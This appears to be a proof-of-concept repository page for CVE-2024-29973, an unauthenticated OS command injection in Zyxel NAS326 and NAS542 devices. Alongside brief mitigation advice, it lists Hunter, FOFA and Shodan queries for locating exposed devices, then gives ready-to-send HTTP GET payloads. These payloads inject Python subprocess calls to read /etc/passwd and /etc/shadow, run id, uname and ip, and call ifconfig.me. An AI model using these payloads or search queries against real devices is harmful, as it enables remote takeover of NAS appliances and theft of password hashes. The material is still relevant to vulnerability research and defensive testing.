CVE-2024-29973 PoC — Zyxel NAS326和Zyxel NAS542 操作系统命令注入漏洞

Source

Associated Vulnerability

Readme

# CVE-2024-29973 - Remote Command Injection Vulnerability

## Description

CVE-2024-29973 is a critical vulnerability found in certain Zyxel networking devices. This vulnerability allows an unauthenticated attacker to execute arbitrary commands on the target device by exploiting improper input validation mechanisms in the firmware. Attackers can send specially crafted HTTP requests to the device, injecting system-level commands and potentially gaining full control over the device.

### Query
Hunter: product.name="ZyXEL NAS542"||product.name="ZyXEL NAS326"
FOFA: app="NAS542" || app="ZYXEL-NAS326"
SHODAN: http.title:"Zyxel NAS326"

### How It Works
Command Injection: The vulnerability arises due to insufficient input sanitization in one of the device's web interfaces. This flaw allows attackers to append operating system commands within parameters of HTTP requests.

Exploit Example: Attackers can inject commands through an HTTP GET request, like the one below, to execute arbitrary code:


```python
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1
```
Impact: Successful exploitation results in the ability to execute system commands, potentially leading to remote control over the device, data leakage, or further compromise of the network.

## Prevention
To mitigate the risks associated with this vulnerability, follow these steps:

Firmware Update: Ensure that all Zyxel devices are updated to the latest firmware version. Zyxel has released patches that address this vulnerability. Regularly check for updates and apply them promptly.

Network Segmentation: Isolate vulnerable devices from critical network infrastructure. Only expose necessary services and ensure administrative interfaces are not publicly accessible.

Firewall Configuration: Restrict incoming and outgoing traffic to essential services only. Block unnecessary HTTP access to Zyxel devices.

Monitor for Suspicious Activity: Implement logging and monitoring tools that can detect and alert on unusual behavior, such as repeated login attempts or abnormal traffic patterns.

References
National Vulnerability Database - CVE-2024-29973
Zyxel Security Advisory

## Images


![alt text](image.png)

# POC

## /etc/passwd
```python
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/passwd",+shell=True)%23 HTTP/1.1
```
## /etc/shadow
```python
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/shadow",+shell=True)%23 HTTP/1.1
```
## ifconfig
```python
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("curl+ifconfig.me",+shell=True)%23 HTTP/1.1
```
## hostname
```python
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("hostname",+shell=True)%23 HTTP/1.1
```

## ip
```python
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("ip+a",+shell=True)%23 HTTP/1.1
```

## uname -a
```python
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("uname+-a",+shell=True)%23 HTTP/1.1
```

## /etc/group
```python
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/group",+shell=True)%23 HTTP/1.1
```

File Snapshot

 [4.0K]  /data/pocs/dfda0c42a27cef96966c172605271057ed26f3e3
├── [2.0K]  CVE-2024-29973.yaml
├── [106K]  image.png
└── [3.7K]  README.md

0 directories, 3 files

Remarks